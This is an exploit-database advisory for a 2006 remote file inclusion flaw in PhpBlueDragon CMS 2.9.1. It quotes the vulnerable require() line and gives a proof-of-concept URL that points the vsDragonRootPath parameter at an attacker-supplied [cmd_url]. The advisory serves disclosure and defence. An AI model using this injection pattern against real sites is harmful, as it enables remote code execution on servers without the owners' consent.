PhpBlueDragon CMS 2.9.1, File inclusion vulnerability

vendor:

PhpBlueDragon CMS

by:

Federico Fazzi

7,5

CVSS

HIGH

File inclusion vulnerability

N/A

CWE

Product Name: PhpBlueDragon CMS

Affected Version From: 2.9.1

Affected Version To: 2.9.1

Patch Exists: unavailable

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

PhpBlueDragon CMS 2.9.1, File inclusion vulnerability

Error occured in template.php, line 23: require($vsDragonRootPath."public_includes/pub_kernel/pbd_template_custom.php"); Proof of concept: http://example/[pbd_path]/software_upload/public_includes/pub_templates/vphptree/template.php?vsDragonRootPath=[cmd_url]/ (note this is with final slash (/))

Mitigation:

sanitized $vsDragonRootPath

Source

Exploit-DB raw data:

-----------------------------------------------------
Advisory id: FSA:015

Author:    Federico Fazzi
Date:      14/06/2006, 18:20
Sinthesis: PhpBlueDragon CMS 2.9.1, File inclusion vulnerability
Type:      high
Product:   http://phpbluedragon.net/
Patch:     unavailable
-----------------------------------------------------


1) Description:

Error occured in template.php, line 23:

---
require($vsDragonRootPath."public_includes/pub_kernel/pbd_template_custom.php");
---

2) Proof of concept:

http://example/[pbd_path]/software_upload/public_includes/pub_templates/vphptree/template.php?vsDragonRootPath=[cmd_url]/
(note this is with final slash (/))

3) Solution:

sanitized $vsDragonRootPath

# milw0rm.com [2006-06-14]